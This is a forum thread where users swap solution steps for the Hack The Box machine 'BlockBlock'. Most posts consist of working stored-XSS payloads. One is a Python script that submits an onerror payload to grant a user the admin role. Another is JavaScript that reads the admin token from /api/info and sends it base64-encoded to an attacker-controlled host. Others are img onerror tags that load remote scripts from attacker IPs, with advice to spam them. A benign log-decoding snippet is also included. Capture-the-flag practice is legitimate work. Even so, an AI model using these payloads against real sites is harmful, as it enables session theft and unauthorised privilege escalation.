BLOCKBLOCK - HTB
by osamy7593 - Saturday November 16, 2024 at 07:12 PM
#21
(Nov 17, 2024, 05:20 PM)0x410x420x41 Wrote: I was able to update it, however indeed I am getting 401 as well

```python
import requests

# Stored-XSS payload: when the report is rendered in the admin's browser, the
# onerror handler POSTs to /api/update_role with the admin's session cookie
payload = "<img src=x onerror=\"fetch('/api/update_role', {method: 'POST', headers: { 'Content-Type': 'application/json'}, body: JSON.stringify({ 'username': 'hacker', 'role': 'admin'})})\" />"

url = 'http://10.129.121.94'
headers = {
    "Content-Type": "application/json"
}

# Log in as the low-privilege user so the report is submitted with a valid session
s = requests.Session()
print("Logging in and sending payload")
r = s.post(f'{url}/api/login', headers=headers, json={"username": "hacker", "password": "hacker"})

# Submit the payload as the "reported" username and print the server's reply
print("Reporting user")
r = s.post(f'{url}/api/report_user', headers=headers, json={ "username": payload })
print(r.status_code)
print(r.text)
```

but it looks like /admin is unavailable even if you have the admin role
Reply
#22
You can steal the admin token like this:
```javascript
fetch('/api/info').then(response => response.text()).then(text => {
    fetch('http://YOUR_IP/log?' + btoa(text), {
        mode: 'no-cors'
    });
});
```
And with the admin token you can successfully access /admin. From there you will see an endpoint /api/json-rpc
Reply
#23
For those who are struggling with the foothold, check the transaction log data using the `eth_getLogs` method
Reply
#24
Still no clue how to do this from step 1, and the reason is my lack of knowledge and skill in blockchain and smart contracts.
Reply
#25
(Nov 17, 2024, 08:02 PM)standby123 Wrote: For those who are struggling with the foothold, check the transaction log data using the `eth_getLogs` method

Looks like mine returns only usernames in the data fields: keira and my test user

```json
{
  "id": 1,
  "jsonrpc": "2.0",
  "result": [
    {
      "address": "0x75e41404c8c1de0c2ec801f06fbf5ace8662240f",
      "blockHash": "0x2fabc9b399133b8ba6792139df43b9072eb284763cd96a258f730f9f909ecd50",
      "blockNumber": "0x1",
      "blockTimestamp": "0x673a84ec",
      "data": "0x000000000000000000000000000000000000000000000000000000000000002000000000000000000000000000000000000000000000000000000000000000056b65697261000000000000000000000000000000000000000000000000000000",
      "logIndex": "0x0",
      "removed": false,
      "topics": ["0xda4cf7a387add8659e1865a2e25624bbace24dd4bc02918e55f150b0e460ef98"],
      "transactionHash": "0x95125517a48dcf4503a067c29f176e646ae0b7d54d1e59c5a7146baf6fa93281",
      "transactionIndex": "0x0"
    },
    {
      "address": "0x75e41404c8c1de0c2ec801f06fbf5ace8662240f",
      "blockHash": "0x13cc5e86991d323ca8da449e4ac2a255777c8a005e31164e10157e64147c934b",
      "blockNumber": "0xd",
      "blockTimestamp": "0x673ade90",
      "data": "0x000000000000000000000000000000000000000000000000000000000000002000000000000000000000000000000000000000000000000000000000000000047465737400000000000000000000000000000000000000000000000000000000",
      "logIndex": "0x0",
      "removed": false,
      "topics": ["0xda4cf7a387add8659e1865a2e25624bbace24dd4bc02918e55f150b0e460ef98"],
      "transactionHash": "0x277ccb3b50b8b66ede314aa050a399937fe6bedb0953f1dabaeeed1435e670b6",
      "transactionIndex": "0x0"
    }
  ]
}
```
Reply
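The `data` field in an `eth_getLogs` entry like the ones above is a single ABI-encoded dynamic `string`: a 32-byte offset word (0x20), a 32-byte length word, then the UTF-8 bytes right-padded to a 32-byte boundary. The decoder below is an added example for the `eth_getLogs` posts (#23 and #25), not code from the thread; the sample response is constructed to mirror the two logs shown (same contract address and topic hash, other fields omitted), and `decode_abi_string` handles only the one-argument string layout seen here.

```python
import json

# Constructed sample mirroring the two logs in the post above: the contract
# address and event-signature hash are the ones shown there; hashes omitted.
EVENT_SIG = "0xda4cf7a387add8659e1865a2e25624bbace24dd4bc02918e55f150b0e460ef98"
CONTRACT = "0x75e41404c8c1de0c2ec801f06fbf5ace8662240f"


def abi_string_data(s: str) -> str:
    """Build the ABI `string` encoding used in the sample (offset, length, padded bytes)."""
    raw = s.encode()
    return ("0x" + format(0x20, "064x") + format(len(raw), "064x")
            + raw.hex().ljust(64, "0"))


SAMPLE_RESPONSE = json.dumps({"id": 1, "jsonrpc": "2.0", "result": [
    {"address": CONTRACT, "blockNumber": "0x1", "blockTimestamp": "0x673a84ec",
     "topics": [EVENT_SIG], "data": abi_string_data("keira")},
    {"address": CONTRACT, "blockNumber": "0xd", "blockTimestamp": "0x673ade90",
     "topics": [EVENT_SIG], "data": abi_string_data("test")},
]})


def decode_abi_string(data_hex: str) -> str:
    """Decode one ABI-encoded dynamic `string` from a log's `data` field,
    validating the offset and length words against the actual payload size."""
    raw = bytes.fromhex(data_hex[2:] if data_hex.startswith("0x") else data_hex)
    if len(raw) < 64:
        raise ValueError("data too short for a dynamic string")
    offset = int.from_bytes(raw[0:32], "big")          # where the length word sits
    if offset + 32 > len(raw):
        raise ValueError("offset points past end of data")
    length = int.from_bytes(raw[offset:offset + 32], "big")
    start = offset + 32
    if start + length > len(raw):
        raise ValueError("declared length runs past end of data")
    return raw[start:start + length].decode("utf-8", errors="replace")


def decode_logs(response_json: str) -> list:
    """Turn an eth_getLogs response into readable rows: block, timestamp, event, value."""
    rows = []
    for log in json.loads(response_json)["result"]:
        rows.append({"block": int(log["blockNumber"], 16),
                     "timestamp": int(log["blockTimestamp"], 16),
                     "event_sig": log["topics"][0],
                     "value": decode_abi_string(log["data"])})
    return rows
```

Both logs share `topics[0]`, which is the keccak hash of the event signature, so they are two emissions of the same event; anything beyond a single string argument needs a full ABI decoder.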
#26
(Nov 17, 2024, 06:30 PM)Shoseathe Wrote: You can steal the admin token like this:
```javascript
fetch('/api/info').then(response => response.text()).then(text => {
    fetch('http://YOUR_IP/log?' + btoa(text), {
        mode: 'no-cors'
    });
});
```
And with the admin token you can successfully access /admin. From there you will see an endpoint /api/json-rpc

Were you able to get this to work with an external script, or directly with XSS by wrapping it in the correct tags (img)?
Reply
#27
(Nov 18, 2024, 07:55 AM)olkn00b Wrote:
(Nov 17, 2024, 06:30 PM)Shoseathe Wrote: You can steal the admin token like this:
```javascript
fetch('/api/info').then(response => response.text()).then(text => {
    fetch('http://YOUR_IP/log?' + btoa(text), {
        mode: 'no-cors'
    });
});
```
And with the admin token you can successfully access /admin. From there you will see an endpoint /api/json-rpc

Were you able to get this to work with an external script, or directly with XSS by wrapping it in the correct tags (img)?

I used an external script for it. The request for the external script was pretty reliable, but getting the admin token back needed multiple tries, like 10 or 20.
Reply
#28
(Nov 18, 2024, 08:21 AM)Shoseathe Wrote:
(Nov 18, 2024, 07:55 AM)olkn00b Wrote:
(Nov 17, 2024, 06:30 PM)Shoseathe Wrote: You can steal the admin token like this:
```javascript
fetch('/api/info').then(response => response.text()).then(text => {
    fetch('http://YOUR_IP/log?' + btoa(text), {
        mode: 'no-cors'
    });
});
```
And with the admin token you can successfully access /admin. From there you will see an endpoint /api/json-rpc

Were you able to get this to work with an external script, or directly with XSS by wrapping it in the correct tags (img)?

I used an external script for it. The request for the external script was pretty reliable, but getting the admin token back needed multiple tries, like 10 or 20.

Thank You!
Reply
#29
(Nov 18, 2024, 08:21 AM)Shoseathe Wrote:
(Nov 18, 2024, 07:55 AM)olkn00b Wrote:
(Nov 17, 2024, 06:30 PM)Shoseathe Wrote: You can steal the admin token like this:
```javascript
fetch('/api/info').then(response => response.text()).then(text => {
    fetch('http://YOUR_IP/log?' + btoa(text), {
        mode: 'no-cors'
    });
});
```
And with the admin token you can successfully access /admin. From there you will see an endpoint /api/json-rpc

Were you able to get this to work with an external script, or directly with XSS by wrapping it in the correct tags (img)?

I used an external script for it. The request for the external script was pretty reliable, but getting the admin token back needed multiple tries, like 10 or 20.

```html
<img src=x onerror="var script = document.createElement('script'); script.src = 'http://10.10.16.10/exploit.js'; document.body.appendChild(script);" />
```

I used this to trigger your script, but didn't get the admin token. Where did I go wrong?
Reply
#30
(Nov 18, 2024, 11:00 AM)xianling88 Wrote:
(Nov 18, 2024, 08:21 AM)Shoseathe Wrote:
(Nov 18, 2024, 07:55 AM)olkn00b Wrote:
(Nov 17, 2024, 06:30 PM)Shoseathe Wrote: You can steal the admin token like this:
```javascript
fetch('/api/info').then(response => response.text()).then(text => {
    fetch('http://YOUR_IP/log?' + btoa(text), {
        mode: 'no-cors'
    });
});
```
And with the admin token you can successfully access /admin. From there you will see an endpoint /api/json-rpc

Were you able to get this to work with an external script, or directly with XSS by wrapping it in the correct tags (img)?

I used an external script for it. The request for the external script was pretty reliable, but getting the admin token back needed multiple tries, like 10 or 20.

```html
<img src=x onerror="var script = document.createElement('script'); script.src = 'http://10.10.16.10/exploit.js'; document.body.appendChild(script);" />
```

I used this to trigger your script, but didn't get the admin token. Where did I go wrong?

Try this one, and spam it.

```html
<img src=\"1\" onerror=\"this.remove(); var s=document.createElement('script'); s.src='http://10.10.xx.xx/script.js'; document.body.appendChild(s);\">
```
Reply